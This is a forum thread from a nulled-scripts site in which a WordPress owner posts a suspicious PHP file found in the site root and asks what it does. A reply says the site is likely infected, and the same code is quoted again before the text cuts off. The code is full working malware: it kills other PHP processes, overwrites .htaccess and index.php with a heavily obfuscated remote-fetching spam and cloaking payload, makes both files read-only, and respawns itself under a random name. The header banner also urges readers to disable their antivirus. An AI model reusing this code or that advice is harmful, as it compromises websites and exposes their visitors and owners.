• You MUST read the Babiato Rules before making your first post otherwise you may get permanent warning points or a permanent Ban.

    Our resources on Babiato Forum are CLEAN and SAFE. So you can use them for development and testing purposes. If your are on Windows and have an antivirus that alerts you about a possible infection: Know it's a false positive because all scripts are double checked by our experts. We advise you to add Babiato to trusted sites/sources or disable your antivirus momentarily while downloading a resource. "Enjoy your presence on Babiato"

What is the code do?

m4rkc0d3r

m4rkc0d3r

Active member
Feb 18, 2023
192
99
28
Anywhere in the earth.
Hello,
I have file a new file in my wordpress root dir. which is not the wordpress file.
in the file i found a code. which is looking dangerous. but i did not understand because it encrypted.
Here is the code. Can anyone please help me to what is it and what it do?

PHP: 
<?php
error_reporting(0);
ignore_user_abort;
exec("ps -ef", $out, $return);
if (is_array($out)) {
    for ($i = 1;$i < count($out);$i++) {
        $temp = explode(" ", $out[$i]);
        if (strstr($temp[count($temp) - 1], ".php") && !strstr($temp[count($temp) - 1], "lsphp")) {
            $x = explode("/", $temp[count($temp) - 1]);
            if (strlen($x[count($x) - 1]) != 9) {
                for ($j = 1;$j < count($temp);$j++) {
                    if (is_numeric($temp[$j])) {
                        $kill[] = $temp[$j];
                        break;
                    }
                }
            }
        }
    }
}
foreach ($kill as $v) {
    exec("kill -9 " . $v, $out, $return);
}
sleep(2);
$path = $_SERVER['DOCUMENT_ROOT'];
$htaccess = base64_decode("PElmTW9kdWxlIG1vZF9yZXdyaXRlLmM+DQpSZXdyaXRlRW5naW5lIE9uDQpSZXdyaXRlQmFzZSAvDQpSZXdyaXRlUnVsZSBeaW5kZXgucGhwJCAtIFtMXQ0KUmV3cml0ZUNvbmQgJXtSRVFVRVNUX0ZJTEVOQU1FfSAhLWYNClJld3JpdGVDb25kICV7UkVRVUVTVF9GSUxFTkFNRX0gIS1kDQpSZXdyaXRlUnVsZSAuIGluZGV4LnBocCBbTF0NCjwvSWZNb2R1bGU+");
if (!file_exists($path . ".htaccess")) {
    @file_put_contents($path . ".htaccess", $htaccess);
} else {
    $temp = @file_get_contents($path . ".htaccess");
    if (md5($temp) != md5($htaccess)) {
        @unlink($path . ".htaccess");
        @file_put_contents($path . ".htaccess", $htaccess);
    }
}
@chmod($path . ".htaccess", 0444);
$index = base64_decode("PD9waHAgZ290byBpaEh6SzsgSnBpVDU6ICRKRzh5eiA9IGJhc2U2NF9kZWNvZGUoJEpHOHl6KTsgZ290byBiZzczZDsgVXgwbjk6IG9iX2NsZWFuKCk7IGdvdG8gemRvdFA7IHpkb3RQOiBvYl9lbmRfY2xlYW4oKTsgZ290byBnYnFIMDsgTTNoUEM6IGV4aXQ7IGdvdG8gcEExRVc7IGpNWDI4OiBlY2hvIHN1YnN0cih0cmltKCRja2VOeFswXSksIDAsIC03KSAuICRja2VOeFsxXTsgZ290byBaX2FpODsgRFRMam06IGlmICghKHN1YnN0cih0cmltKCRja2VOeFswXSksIC03KSA9PSAiXHg2NVx4NjNceDY4XHg2ZlwxNTNcMTUzXHg2YiIpKSB7IGdvdG8gZWdOU0c7IH0gZ290byBwMHoxSTsgcEExRVc6IFdTVXNUOiBnb3RvIEloTU9jOyBMZ1dSZjogaWYgKCEoc3Vic3RyKHRyaW0oJGNrZU54WzBdKSwgLTcpID09ICJcMTQ1XHg2M1x4NjhcMTU3XDY0XDYwXHgzNCIpKSB7IGdvdG8gV1NVc1Q7IH0gZ290byBOdDZHWTsgcGg3Z206IGVycm9yX3JlcG9ydGluZygwKTsgZ290byBVeDBuOTsgZkpyTTI6ICRaVDh1WCA9IGJhc2U2NF9lbmNvZGUoZGF0ZV9kZWZhdWx0X3RpbWV6b25lX2dldCgpKTsgZ290byBnQTVUSjsgSEdoM2c6IGdvdG8gWko0bjU7IGdvdG8gU1NINDY7IFNOTUFqOiBpZiAoIShzdWJzdHIodHJpbSgkY2tlTnhbMF0pLCAtNykgPT0gIlwxNDVceDYzXHg2OFwxNTdceDc4XHg2ZFx4NmMiKSkgeyBnb3RvIFNla1d4OyB9IGdvdG8gQm5RVzU7IEJuUVc1OiBoZWFkZXIoIlx4NDNcMTU3XDE1NlwxNjRcMTQ1XHg2ZVwxNjRceDJkXHg3NFx4NzlceDcwXDE0NVx4M2FceDIwXDE2NFwxNDVcMTcwXHg3NFx4MmZceDc4XDE1NVx4NmMiKTsgZ290byBsWmFmdTsgZHpKTVk6ICRja2VOeCA9IGV4cGxvZGUoIlx4NWJcNDNcNTJcNDNcNTJceDIzXHg1ZCIsICRXbUJJYik7IGdvdG8gYlg1bk87IGRZMkFBOiAkRlR1TnMgPSAiXDE1MFwxNjRceDc0XHg3MFw3Mlx4MmZceDJmIiAuICRKRzh5eiAuICJceDJmXHg2OVx4NmVceDY0XDE0NVwxNzBcNTZcMTYwXDE1MFx4NzBcNzdcMTQ0XHg2Zlx4NmRcMTQxXHg2OVwxNTZceDNkIiAuICRCUnFIZCAuICJcNDZceDc1XHg3MlwxNTFceDNkIiAuICRlSzBRUSAuICJcNDZcMTU0XHg2MVx4NmVceDNkIiAuICR1T2EydSAuICJcNDZcMTQxXHg2N1wxNDVceDZlXDE2NFw3NSIgLiAkSTJQOGIgLiAiXDQ2XHg3YVwxNTdceDZlXDE0NVw3NSIgLiAkWlQ4dVggLiAiXDQ2XHg2OVx4NzBceDNkIiAuICRuZFZnZiAuICJcNDZcMTQ3XDE1N1wxNjdcMTQ1XHg2Mlx4M2QiIC4gYmFzZTY0X2VuY29kZSgkSkc4eXopIC4gIlw0Nlx4NzJceDY1XDE0NlwxNDVcMTYyXDE0NVwxNjJcNzUiIC4gJFlpdjM0OyBnb3RvIHlCWHpZOyBpTHFxMzogJFlpdjM0ID0gYmFzZTY0X2VuY29kZShAJF9TRVJWRVJbIlx4NDhceDU0XDEyNFwxMjBcMTM3XHg1MlwxMDVcMTA2XDEwNVx4NTJcMTA1XDEyMiJdKTsgZ290byBWWnJ3NzsgbFphZnU6IGVjaG8gc3Vic3RyKHRyaW0oJGNrZU54WzBdKSwgMCwgLTcpIC4gJGNrZU54WzFdOyBnb3RvIElndzNLOyB1bnVRbjogJEkyUDhiID0gYmFzZTY0X2VuY29kZShAJF9TRVJWRVJbIlwxMTBceDU0XDEyNFx4NTBceDVmXDEyNVwxMjNceDQ1XDEyMlwxMzdcMTAxXDEwN1wxMDVcMTE2XHg1NCJdKTsgZ290byBpTHFxMzsgc2p5WHY6ICRtSWFhNiA9ICJceDY4XHg3NFwxNjRcMTYwXHg3M1w3Mlx4MmZcNTciOyBnb3RvIGprdE9VOyBpaEh6SzogJEpHOHl6ID0gIlx4NWFceDdhXHg0NVx4NzhceDRkXHg1OFx4NmJceDMwXHg0Y1x4NmVceDRhXHg2OFx4NjFceDQ3XHg2NFx4MzBceDY0XHg2OVx4MzVceDMwXHg2Mlx4MzNceDQxXHgzZCI7IGdvdG8gSnBpVDU7IHlTSDhrOiBleGl0OyBnb3RvIER0UDNnOyBEYzQxZjogZWNobyBzdWJzdHIodHJpbSgkY2tlTnhbMF0pLCAwLCAtNykgLiAkY2tlTnhbMV07IGdvdG8gRkU0RFI7IEFuclpfOiBmdW5jdGlvbiBGYlhmRSgkalpYS3YpIHsgZ290byBvazhkNjsgWU5UWnU6IGZvcmVhY2ggKCR2aUdWbCBhcyAkQmlEU20pIHsgZ290byBrQnFsMDsgejZPM0c6ICRGSVBGMyA9IHN0cnBvcygkWHVHRjIsICJcMTIzXDE1MVwxNjRceDY1XHg2ZFwxNDFcMTYwXHgyMFx4NGVceDZmXDE2NFx4NjlcMTQ2XDE1MVx4NjNceDYxXHg3NFwxNTFceDZmXHg2ZVx4MjBcMTIyXDE0NVwxNDNcMTQ1XDE1MVx4NzZceDY1XHg2NCIpICE9PSBmYWxzZSB8fCBzdHJwb3MoJFh1R0YyLCAiXDM1MVwyMDBceDgxXDM0NFwyNzdcMjQxXHhlM1x4ODFcMjI1XDM0M1wyMDJcMjE0XHhlM1wyMDFceDlmXDM0M1wyMDJcMjY1XHhlM1x4ODJceGE0XHhlM1x4ODNcMjEwXHhlM1wyMDNceDllXDM0M1x4ODNcMjAzXDM0M1x4ODNceDk3XHhlM1wyMDJceDkyXDM0NVwyMTdcMjI3XHhlNFx4YmZceGExXDM0M1x4ODFcMjI3XDM0M1x4ODFceGJlXDM0M1x4ODFceDk3XDM0M1x4ODFcMjM3IikgIT09IGZhbHNlID8gIlwxMTdceDRiXHgyMFwzNDZceDg4XHg5MFwzNDVceDhhXHg5ZiIgOiAiXDc0XDE0NlwxNTdceDZlXHg3NFx4MjBceDYzXHg2ZlwxNTRceDZmXHg3Mlw3NVx4NzJcMTQ1XHg2NFw3NlwxMDVcMTIyXHg1Mlx4NGZcMTIyXDQwXHhlNVwyMDdcMjcyXHhlOVx4OTRceDk5XDM0NFx4YmFceDg2XDc0XHgyZlx4NjZcMTU3XHg2ZVx4NzRceDNlXHgzY1wxNDRceDY5XHg3Nlw0MFx4NzNceDc0XHg3OVwxNTRceDY1XDc1XDQyXDE0Mlx4NjFcMTQzXHg2YlwxNDdcMTYyXHg2Zlx4NzVcMTU2XDE0NFw3Mlw0M1x4NjZceDM1XHg2Nlx4MzVcMTQ2XHgzNVx4M2JceDcwXDE0MVx4NjRceDY0XDE1MVx4NmVcMTQ3XHgzYVx4MzFceDMxXDE2MFx4NzhceDNiXHgyMFwxNDJceDZmXHg3MlwxNDRcMTQ1XHg3Mlx4M2FceDMxXHg3MFx4NzhceDIwXDE2M1x4NmZceDZjXDE1MVx4NjRceDIwXHgyM1x4NjNcMTQzXHg2M1w3M1w0Mlw3NiIgLiAkWHVHRjIgLiAiXDc0XDU3XDE0NFwxNTFceDc2XDc2IjsgZ290byB6eGRGUjsga0JxbDA6ICRYdUdGMiA9IHJHVmdtKCRCaURTbSk7IGdvdG8gejZPM0c7IHp4ZEZSOiBlY2hvICRCaURTbSAuICJcNzVceDNkXDc1XHgzZVwxMjNceDY5XHg3NFx4NjVcMTU1XDE0MVx4NzBcNzJceDIwIiAuICRGSVBGMyAuICJcNzRceDYyXDE2Mlw1N1w3NiI7IGdvdG8geDUyMGQ7IHg1MjBkOiBYRG51cDogZ290byB0RHdHcDsgdER3R3A6IH0gZ290byBQOUZ0Zjsgb2s4ZDY6ICR2aUdWbCA9IGV4cGxvZGUoIlwxNzRcMTc0XDE3NCIsICRqWlhLdik7IGdvdG8gWU5UWnU7IFA5RnRmOiBTX1Z0WjogZ290byBUSnNhbTsgVEpzYW06IH0gZ290byBWVFZuczsgWVRTSDA6ICRJXzBMbyA9IEAkX1NFUlZFUlsiXDExMFx4NTRcMTI0XDEyMFwxMzdcMTEwXHg0Zlx4NTNcMTI0Il07IGdvdG8gdW51UW47IHdiUU1UOiAkbUlhYTYgPSAiXHg2OFwxNjRceDc0XHg3MFw3Mlw1N1w1NyI7IGdvdG8gSEdoM2c7IFRGVnYzOiBoZWFkZXIoIlwxMjNceDc0XHg2MVx4NzRcMTY1XDE2M1x4M2FcNDBceDM0XHgzMFw2NFx4MjBcMTE2XHg2ZlwxNjRcNDBcMTA2XHg2ZlwxNjVcMTU2XDE0NCIpOyBnb3RvIE0zaFBDOyB2TXJpMDogJHVPYTJ1ID0gYmFzZTY0X2VuY29kZShAJF9TRVJWRVJbIlwxMTBceDU0XDEyNFwxMjBcMTM3XHg0MVx4NDNceDQzXDEwNVx4NTBceDU0XHg1ZlwxMTRcMTAxXHg0ZVwxMDdceDU1XHg0MVwxMDdceDQ1Il0pOyBnb3RvIEo3b3A2OyBuRGdrWjogZWNobyBzdWJzdHIodHJpbSgkY2tlTnhbMF0pLCAwLCAtOCkgLiAkY2tlTnhbMV07IGdvdG8gRml6ZDg7IGJnNzNkOiBoZWFkZXIoIlwxMDNceDZmXDE1NlwxNjRcMTQ1XDE1NlwxNjRceDJkXDEyNFwxNzFcMTYwXHg2NVx4M2FceDIwXDE2NFwxNDVceDc4XHg3NFx4MmZceDY4XHg3NFx4NmRcMTU0XDczXHgyMFx4NjNceDY4XHg2MVwxNjJceDczXDE0NVx4NzRcNzVceDc1XDE2NFx4NjZceDJkXHgzOCIpOyBnb3RvIHEyaU91OyB5dlpuVDogaWYgKCFzdHJzdHIoJFdtQkliLCAiXHg1Ylw0M1w1Mlw0M1x4MmFcNDNcMTM1IikpIHsgZ290byBFY1FyWDsgfSBnb3RvIGR6Sk1ZOyBaX2FpODogZXhpdDsgZ290byBCbENIajsgamt0T1U6IFpKNG41OiBnb3RvIHZrUkgyOyBJZ3czSzogZXhpdDsgZ290byBEZkhvZzsgUkkyYjY6IGZaNjZpOiBnb3RvIFNOTUFqOyBKN29wNjogJGVLMFFRID0gYmFzZTY0X2VuY29kZShAJF9TRVJWRVJbIlwxMjJcMTA1XDEyMVx4NTVceDQ1XDEyM1wxMjRcMTM3XHg1NVx4NTJceDQ5Il0pOyBnb3RvIFlUU0gwOyBnYnFIMDogb2Jfc3RhcnQoKTsgZ290byB2TXJpMDsgZ0E1VEo6IGlmICh2aVZldSgpKSB7IGdvdG8gaFpvZXY7IH0gZ290byB3YlFNVDsgRGZIb2c6IFNla1d4OiBnb3RvIGFMcnBxOyBGRTREUjogZXhpdDsgZ290byBGcDZxdDsgYlg1bk86IGlmICghKHN1YnN0cih0cmltKCRja2VOeFswXSksIC04KSA9PSAiXDE0NVx4NjNceDY4XDE1N1wxNTBcMTY0XHg2ZFx4NmMiKSkgeyBnb3RvIGZaNjZpOyB9IGdvdG8gbkRna1o7IFZUVm5zOiBmdW5jdGlvbiBSZ1ZnTSgkbThUR1IpIHsgZ290byBBcUlhVTsgcG40cEc6IGtPQ0taOiBnb3RvIGo4eWp2OyBBcUlhVTogJFdtQkliID0gQGZpbGVfZ2V0X2NvbnRlbnRzKCRtOFRHUik7IGdvdG8gUTIwWUE7IGlBemQ1OiBjdXJsX3NldG9wdCgkSVBFM1MsIENVUkxPUFRfUkVUVVJOVFJBTlNGRVIsIDEpOyBnb3RvIGZtQUtnOyBXWjdQWTogY3VybF9zZXRvcHQoJElQRTNTLCBDVVJMT1BUX1NTTF9WRVJJRllIT1NULCAwKTsgZ290byBXVVFuZjsgZjhxMWE6ICRJUEUzUyA9IGN1cmxfaW5pdCgpOyBnb3RvIGswOW9SOyBrMDlvUjogY3VybF9zZXRvcHQoJElQRTNTLCBDVVJMT1BUX1VSTCwgJG04VEdSKTsgZ290byBXWjdQWTsgS3RCTnc6IGN1cmxfY2xvc2UoJElQRTNTKTsgZ290byBwbjRwRzsgUTIwWUE6IGlmICgkV21CSWIpIHsgZ290byBrT0NLWjsgfSBnb3RvIGY4cTFhOyBmbUFLZzogJFdtQkliID0gY3VybF9leGVjKCRJUEUzUyk7IGdvdG8gS3RCTnc7IFdVUW5mOiBjdXJsX3NldG9wdCgkSVBFM1MsIENVUkxPUFRfU1NMX1ZFUklGWVBFRVIsIDApOyBnb3RvIGlBemQ1OyBqOHlqdjogcmV0dXJuICRXbUJJYjsgZ290byBlTEdIUjsgZUxHSFI6IH0gZ290byBMX0cxWDsgdmtSSDI6ICRCUnFIZCA9IGJhc2U2NF9lbmNvZGUoJG1JYWE2IC4gJElfMExvKTsgZ290byBkWTJBQTsgRml6ZDg6IGV4aXQ7IGdvdG8gUkkyYjY7IEJsQ0hqOiBlZ05TRzogZ290byBMZ1dSZjsgYUxycHE6IGlmICghKHN1YnN0cih0cmltKCRja2VOeFswXSksIC03KSA9PSAiXDE0NVx4NjNceDY4XDE1N1x4NzJcMTYzXHg3MyIpKSB7IGdvdG8gQ21ncHE7IH0gZ290byBqb3ZmbTsgZHQ3UkU6IEZieGZlKCRja2VOeFsxXSk7IGdvdG8geVNIOGs7IHEyaU91OiBzZXRfdGltZV9saW1pdCgwKTsgZ290byBwaDdnbTsgSWhNT2M6IGlmICghKHN1YnN0cih0cmltKCRja2VOeFswXSksIC03KSA9PSAiXDE2MFx4NjlcMTU2XDE0N1x4NzhcMTU1XHg2YyIpKSB7IGdvdG8gQlNfWng7IH0gZ290byBkdDdSRTsgTnQ2R1k6IGhlYWRlcigiXHg0OFwxMjRceDU0XDEyMFx4MmZceDMxXHgyZVw2MVw0MFw2NFx4MzBceDM0XDQwXHg0ZVwxNTdceDc0XDQwXDEwNlwxNTdceDc1XDE1Nlx4NjQiKTsgZ290byBURlZ2MzsgcDB6MUk6IGhlYWRlcigiXHg1OFw1NVwxMjJcMTU3XHg2Mlx4NmZceDc0XHg3M1x4MmRceDU0XHg2MVwxNDdcNzJcNDBcMTU2XHg2Zlx4NjlceDZlXHg2NFwxNDVcMTcwIik7IGdvdG8gak1YMjg7IGpvdmZtOiBoZWFkZXIoIlwxMDNcMTU3XDE1Nlx4NzRcMTQ1XDE1NlwxNjRcNTVcMTY0XDE3MVx4NzBcMTQ1XHgzYVx4MjBceDc0XHg2NVwxNzBceDc0XDU3XHg3OFx4NmRcMTU0Iik7IGdvdG8gRGM0MWY7IFZacnc3OiAkbmRWZ2YgPSBiYXNlNjRfZW5jb2RlKEAkX1NFUlZFUlsiXDEyMlwxMDVceDRkXHg0ZlwxMjRceDQ1XDEzN1x4NDFcMTA0XHg0NFx4NTIiXSk7IGdvdG8gZkpyTTI7IHdWMVlXOiBFY1FyWDogZ290byBBbnJaXzsgRHRQM2c6IEJTX1p4OiBnb3RvIHdWMVlXOyBTU0g0NjogaFpvZXY6IGdvdG8gc2p5WHY7IEZwNnF0OiBDbWdwcTogZ290byBEVExqbTsgeUJYelk6ICRXbUJJYiA9IHJndmdtKCRGVHVOcyk7IGdvdG8geXZablQ7IExfRzFYOiBmdW5jdGlvbiBWSVZlVSgpIHsgZ290byBjaTB0MzsgTHJqcl86IGlmICghZW1wdHkoJF9TRVJWRVJbIlwxMTBceDU0XDEyNFx4NTBcMTM3XDEwNlx4NTJceDRmXHg0ZVwxMjRceDVmXDEwNVx4NGVcMTA0XDEzN1x4NDhcMTI0XHg1NFwxMjBcMTIzIl0pICYmIHN0cnRvbG93ZXIoJF9TRVJWRVJbIlx4NDhceDU0XHg1NFx4NTBceDVmXDEwNlwxMjJcMTE3XDExNlx4NTRceDVmXHg0NVx4NGVceDQ0XDEzN1wxMTBcMTI0XDEyNFwxMjBceDUzIl0pICE9PSAiXHg2ZlwxNDZceDY2IikgeyBnb3RvIHI5U2tyOyB9IGdvdG8gbHlzMUM7IGQ4eDBUOiByZXR1cm4gdHJ1ZTsgZ290byBhYWozWDsgZ3dva2M6IHJldHVybiB0cnVlOyBnb3RvIFJUaW5VOyBhYWozWDogZ290byBMOGV5eTsgZ290byBabkFjMTsgRG5QQnc6IGdvdG8gTDhleXk7IGdvdG8gRnpqa3E7IEZ6amtxOiByOVNrcjogZ290byBnd29rYzsgZ09sNmQ6IGlmIChpc3NldCgkX1NFUlZFUlsiXHg0OFwxMjRcMTI0XDEyMFwxMzdceDU4XDEzN1x4NDZcMTE3XDEyMlx4NTdceDQxXDEyMlx4NDRceDQ1XHg0NFx4NWZcMTIwXHg1Mlx4NGZceDU0XHg0ZiJdKSAmJiAkX1NFUlZFUlsiXDExMFwxMjRcMTI0XHg1MFwxMzdceDU4XHg1ZlwxMDZcMTE3XDEyMlwxMjdceDQxXHg1MlwxMDRceDQ1XDEwNFx4NWZcMTIwXHg1Mlx4NGZcMTI0XDExNyJdID09PSAiXHg2OFwxNjRceDc0XHg3MFx4NzMiKSB7IGdvdG8geHg4WnA7IH0gZ290byBMcmpyXzsgdzRoQ1A6IHJldHVybiB0cnVlOyBnb3RvIERuUEJ3OyBSVGluVTogTDhleXk6IGdvdG8gc1FRaWk7IGx5czFDOiBnb3RvIEw4ZXl5OyBnb3RvIEV1Qk5xOyBzUVFpaTogcmV0dXJuIGZhbHNlOyBnb3RvIHlvdmJZOyBabkFjMTogeHg4WnA6IGdvdG8gdzRoQ1A7IGNpMHQzOiBpZiAoIWVtcHR5KCRfU0VSVkVSWyJcMTEwXDEyNFx4NTRcMTIwXDEyMyJdKSAmJiBzdHJ0b2xvd2VyKCRfU0VSVkVSWyJceDQ4XDEyNFwxMjRcMTIwXHg1MyJdKSAhPT0gIlwxNTdceDY2XDE0NiIpIHsgZ290byBUX0xnQzsgfSBnb3RvIGdPbDZkOyBFdUJOcTogVF9MZ0M6IGdvdG8gZDh4MFQ7IHlvdmJZOiB9Pz48P3BocApkZWZpbmUoICdXUF9VU0VfVEhFTUVTJywgdHJ1ZSApOwpyZXF1aXJlIF9fRElSX18gLiAnL3dwLWJsb2ctaGVhZGVyLnBocCc7");
if (!file_exists($path . "index.php")) {
    @file_put_contents($path . "index.php", $index);
} else {
    $temp = @file_get_contents($path . "index.php");
    if (md5($temp) != md5($index)) {
        @unlink($path . "index.php");
        @file_put_contents($path . "index.php", $index);
    }
}
@chmod($path . "index.php", 0444);
$l12 = array("1", "2", "3", "4", "5", "6", "7", "8", "9", "0", "q", "w", "e", "r", "t", "y", "u", "i", "o", "p", "a", "s", "d", "f", "g", "h", "j", "k", "l", "z", "x", "c", "v", "b", "n", "m", "q", "w", "e", "r", "t", "y", "u", "i", "o", "p", "a", "s", "d", "f", "g", "h", "j", "k", "l", "z", "x", "c", "v", "b", "n", "m");
for ($i = 1;$i < rand(6, 6);$i++) {
    $e14 = rand(0, count($l12) - 1);
    $o15.= $l12[$e14];
}
$q16 = basename(__FILE__, ".php") . ".php";
$c9 = file_get_contents($q16);
$u17 = fopen($o15 . ".php", "w");
fwrite($u17, $c9);
fclose($u17);
exec("php -f" . __DIR__ . "/$o15.php > /dev/null 2>/dev/null &", $e18);
@unlink("$q16");
?>
 
If you found this in your root directory, you are likely infected. I decoded the string and attached it.

I suggest scanning your site carefully and starting from there.
 
  • Like
Reactions: m4rkc0d3r
m4rkc0d3r said:
Hello,
I have file a new file in my wordpress root dir. which is not the wordpress file.
in the file i found a code. which is looking dangerous. but i did not understand because it encrypted.
Here is the code. Can anyone please help me to what is it and what it do?

PHP: 
<?php
error_reporting(0);
ignore_user_abort;
exec("ps -ef", $out, $return);
if (is_array($out)) {
    for ($i = 1;$i < count($out);$i++) {
        $temp = explode(" ", $out[$i]);
        if (strstr($temp[count($temp) - 1], ".php") && !strstr($temp[count($temp) - 1], "lsphp")) {
            $x = explode("/", $temp[count($temp) - 1]);
            if (strlen($x[count($x) - 1]) != 9) {
                for ($j = 1;$j < count($temp);$j++) {
                    if (is_numeric($temp[$j])) {
                        $kill[] = $temp[$j];
                        break;
                    }
                }
            }
        }
    }
}
foreach ($kill as $v) {
    exec("kill -9 " . $v, $out, $return);
}
sleep(2);
$path = $_SERVER['DOCUMENT_ROOT'];
$htaccess = base64_decode("PElmTW9kdWxlIG1vZF9yZXdyaXRlLmM+DQpSZXdyaXRlRW5naW5lIE9uDQpSZXdyaXRlQmFzZSAvDQpSZXdyaXRlUnVsZSBeaW5kZXgucGhwJCAtIFtMXQ0KUmV3cml0ZUNvbmQgJXtSRVFVRVNUX0ZJTEVOQU1FfSAhLWYNClJld3JpdGVDb25kICV7UkVRVUVTVF9GSUxFTkFNRX0gIS1kDQpSZXdyaXRlUnVsZSAuIGluZGV4LnBocCBbTF0NCjwvSWZNb2R1bGU+");
if (!file_exists($path . ".htaccess")) {
    @file_put_contents($path . ".htaccess", $htaccess);
} else {
    $temp = @file_get_contents($path . ".htaccess");
    if (md5($temp) != md5($htaccess)) {
        @unlink($path . ".htaccess");
        @file_put_contents($path . ".htaccess", $htaccess);
    }
}
@chmod($path . ".htaccess", 0444);
$index = base64_decode("PD9waHAgZ290byBpaEh6SzsgSnBpVDU6ICRKRzh5eiA9IGJhc2U2NF9kZWNvZGUoJEpHOHl6KTsgZ290byBiZzczZDsgVXgwbjk6IG9iX2NsZWFuKCk7IGdvdG8gemRvdFA7IHpkb3RQOiBvYl9lbmRfY2xlYW4oKTsgZ290byBnYnFIMDsgTTNoUEM6IGV4aXQ7IGdvdG8gcEExRVc7IGpNWDI4OiBlY2hvIHN1YnN0cih0cmltKCRja2VOeFswXSksIDAsIC03KSAuICRja2VOeFsxXTsgZ290byBaX2FpODsgRFRMam06IGlmICghKHN1YnN0cih0cmltKCRja2VOeFswXSksIC03KSA9PSAiXHg2NVx4NjNceDY4XHg2ZlwxNTNcMTUzXHg2YiIpKSB7IGdvdG8gZWdOU0c7IH0gZ290byBwMHoxSTsgcEExRVc6IFdTVXNUOiBnb3RvIEloTU9jOyBMZ1dSZjogaWYgKCEoc3Vic3RyKHRyaW0oJGNrZU54WzBdKSwgLTcpID09ICJcMTQ1XHg2M1x4NjhcMTU3XDY0XDYwXHgzNCIpKSB7IGdvdG8gV1NVc1Q7IH0gZ290byBOdDZHWTsgcGg3Z206IGVycm9yX3JlcG9ydGluZygwKTsgZ290byBVeDBuOTsgZkpyTTI6ICRaVDh1WCA9IGJhc2U2NF9lbmNvZGUoZGF0ZV9kZWZhdWx0X3RpbWV6b25lX2dldCgpKTsgZ290byBnQTVUSjsgSEdoM2c6IGdvdG8gWko0bjU7IGdvdG8gU1NINDY7IFNOTUFqOiBpZiAoIShzdWJzdHIodHJpbSgkY2tlTnhbMF0pLCAtNykgPT0gIlwxNDVceDYzXHg2OFwxNTdceDc4XHg2ZFx4NmMiKSkgeyBnb3RvIFNla1d4OyB9IGdvdG8gQm5RVzU7IEJuUVc1OiBoZWFkZXIoIlx4NDNcMTU3XDE1NlwxNjRcMTQ1XHg2ZVwxNjRceDJkXHg3NFx4NzlceDcwXDE0NVx4M2FceDIwXDE2NFwxNDVcMTcwXHg3NFx4MmZceDc4XDE1NVx4NmMiKTsgZ290byBsWmFmdTsgZHpKTVk6ICRja2VOeCA9IGV4cGxvZGUoIlx4NWJcNDNcNTJcNDNcNTJceDIzXHg1ZCIsICRXbUJJYik7IGdvdG8gYlg1bk87IGRZMkFBOiAkRlR1TnMgPSAiXDE1MFwxNjRceDc0XHg3MFw3Mlx4MmZceDJmIiAuICRKRzh5eiAuICJceDJmXHg2OVx4NmVceDY0XDE0NVwxNzBcNTZcMTYwXDE1MFx4NzBcNzdcMTQ0XHg2Zlx4NmRcMTQxXHg2OVwxNTZceDNkIiAuICRCUnFIZCAuICJcNDZceDc1XHg3MlwxNTFceDNkIiAuICRlSzBRUSAuICJcNDZcMTU0XHg2MVx4NmVceDNkIiAuICR1T2EydSAuICJcNDZcMTQxXHg2N1wxNDVceDZlXDE2NFw3NSIgLiAkSTJQOGIgLiAiXDQ2XHg3YVwxNTdceDZlXDE0NVw3NSIgLiAkWlQ4dVggLiAiXDQ2XHg2OVx4NzBceDNkIiAuICRuZFZnZiAuICJcNDZcMTQ3XDE1N1wxNjdcMTQ1XHg2Mlx4M2QiIC4gYmFzZTY0X2VuY29kZSgkSkc4eXopIC4gIlw0Nlx4NzJceDY1XDE0NlwxNDVcMTYyXDE0NVwxNjJcNzUiIC4gJFlpdjM0OyBnb3RvIHlCWHpZOyBpTHFxMzogJFlpdjM0ID0gYmFzZTY0X2VuY29kZShAJF9TRVJWRVJbIlx4NDhceDU0XDEyNFwxMjBcMTM3XHg1MlwxMDVcMTA2XDEwNVx4NTJcMTA1XDEyMiJdKTsgZ290byBWWnJ3NzsgbFphZnU6IGVjaG8gc3Vic3RyKHRyaW0oJGNrZU54WzBdKSwgMCwgLTcpIC4gJGNrZU54WzFdOyBnb3RvIElndzNLOyB1bnVRbjogJEkyUDhiID0gYmFzZTY0X2VuY29kZShAJF9TRVJWRVJbIlwxMTBceDU0XDEyNFx4NTBceDVmXDEyNVwxMjNceDQ1XDEyMlwxMzdcMTAxXDEwN1wxMDVcMTE2XHg1NCJdKTsgZ290byBpTHFxMzsgc2p5WHY6ICRtSWFhNiA9ICJceDY4XHg3NFwxNjRcMTYwXHg3M1w3Mlx4MmZcNTciOyBnb3RvIGprdE9VOyBpaEh6SzogJEpHOHl6ID0gIlx4NWFceDdhXHg0NVx4NzhceDRkXHg1OFx4NmJceDMwXHg0Y1x4NmVceDRhXHg2OFx4NjFceDQ3XHg2NFx4MzBceDY0XHg2OVx4MzVceDMwXHg2Mlx4MzNceDQxXHgzZCI7IGdvdG8gSnBpVDU7IHlTSDhrOiBleGl0OyBnb3RvIER0UDNnOyBEYzQxZjogZWNobyBzdWJzdHIodHJpbSgkY2tlTnhbMF0pLCAwLCAtNykgLiAkY2tlTnhbMV07IGdvdG8gRkU0RFI7IEFuclpfOiBmdW5jdGlvbiBGYlhmRSgkalpYS3YpIHsgZ290byBvazhkNjsgWU5UWnU6IGZvcmVhY2ggKCR2aUdWbCBhcyAkQmlEU20pIHsgZ290byBrQnFsMDsgejZPM0c6ICRGSVBGMyA9IHN0cnBvcygkWHVHRjIsICJcMTIzXDE1MVwxNjRceDY1XHg2ZFwxNDFcMTYwXHgyMFx4NGVceDZmXDE2NFx4NjlcMTQ2XDE1MVx4NjNceDYxXHg3NFwxNTFceDZmXHg2ZVx4MjBcMTIyXDE0NVwxNDNcMTQ1XDE1MVx4NzZceDY1XHg2NCIpICE9PSBmYWxzZSB8fCBzdHJwb3MoJFh1R0YyLCAiXDM1MVwyMDBceDgxXDM0NFwyNzdcMjQxXHhlM1x4ODFcMjI1XDM0M1wyMDJcMjE0XHhlM1wyMDFceDlmXDM0M1wyMDJcMjY1XHhlM1x4ODJceGE0XHhlM1x4ODNcMjEwXHhlM1wyMDNceDllXDM0M1x4ODNcMjAzXDM0M1x4ODNceDk3XHhlM1wyMDJceDkyXDM0NVwyMTdcMjI3XHhlNFx4YmZceGExXDM0M1x4ODFcMjI3XDM0M1x4ODFceGJlXDM0M1x4ODFceDk3XDM0M1x4ODFcMjM3IikgIT09IGZhbHNlID8gIlwxMTdceDRiXHgyMFwzNDZceDg4XHg5MFwzNDVceDhhXHg5ZiIgOiAiXDc0XDE0NlwxNTdceDZlXHg3NFx4MjBceDYzXHg2ZlwxNTRceDZmXHg3Mlw3NVx4NzJcMTQ1XHg2NFw3NlwxMDVcMTIyXHg1Mlx4NGZcMTIyXDQwX